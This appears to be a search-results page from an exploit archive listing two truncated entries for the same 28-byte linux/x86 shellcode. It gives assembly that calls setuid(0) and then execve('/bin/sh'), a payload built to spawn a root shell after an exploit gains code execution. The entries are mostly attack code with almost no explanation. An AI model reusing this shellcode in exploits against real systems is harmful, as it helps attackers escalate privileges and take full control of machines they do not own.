2 matches found
linux/x86 setuid(0) & execve(/bin/sh 0 0) shellcode 28 bytes
No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...
linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes
linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes. Shellcode exploit for linx86 platform -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f...